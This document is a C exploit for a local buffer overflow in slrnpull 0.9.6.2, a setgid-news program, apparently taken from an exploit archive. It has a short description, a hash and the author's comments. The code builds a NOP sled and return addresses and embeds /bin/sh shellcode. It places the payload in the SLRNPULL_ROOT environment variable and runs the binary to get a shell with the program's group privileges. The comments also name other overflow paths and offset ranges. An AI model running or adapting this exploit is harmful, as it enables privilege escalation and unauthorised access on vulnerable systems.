Slrnpull.c exploits a local buffer overflow vulnerability in slrnpull version 0.9.6.2, which is setgid news. Tested against RedHat 6.2.
416129da6ec1a149669dbfa4d033e8be06cf479f020fc5eefda50e6ade9d3fc9
/* (linux)slrnpull[slrn_v0.9.6.2-] buffer overflow, by v9[v9@fakehalo.org]. i
made this after i viewed Michal Zalewski's "rh 6.2 - gid compromises, etc"
(posted: Wed Jun 21 2000 06:54:08) text on bugtraq. according to his text
slrnpull among other programs is exploitable. so, i downloaded the source
and scanned through it to write little exploit for it.
note: there didn't appear to be any set*gid() code in the source, execpt
mentions of it, so i'm just using generic (non-set*id) shellcode.
also, i just plucked one of the ways to overflow this: -d(spooldir)
option, NNTPSERVER environment variable, etc. overflow. the main slrn
program has many overflows as well. offsets should range from 1200
to 2900. (roughly)
*/
#define FILENAME "slrnpull" // (which) slrnpull filename to execute.
#define BUFFER 2048 // buffer size used to overflow.
#define DEFAULT_OFFSET 1750 // default offset, argv option.
#define DEFAULT_ALIGN 1 // default align, argv option.
static char exec[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56"
"\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
"\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // still 01.
long sp(void){__asm__("movl %esp,%eax");} // where offset is add/sub from.
void execute(){
char cmd[256];
snprintf(cmd,256,"`which %s`",FILENAME);
system(cmd);
}
int main(int argc,char **argv){
char bof[BUFFER];
int i,offset,align;
long ret;
printf("[ slrnpull[slrn_v0.9.6.2-] local buffer overflow, by: v9[v9@fakehalo.o"
"rg]. ]\n");
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** invalid alignment value(%s), using internal default: %d. (0-3)\n"
,argv[2],DEFAULT_ALIGN);
align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
ret=(sp()+offset);
printf("[ return address: 0x%lx, offset: %d, address alignment: %d. ]\n"
,ret,offset,align);
for(i=align;i<BUFFER;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(BUFFER-strlen(exec)-100);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
bof[BUFFER]='\0';
setenv("SLRNPULL_ROOT",bof,1);
execute();
exit(0);
}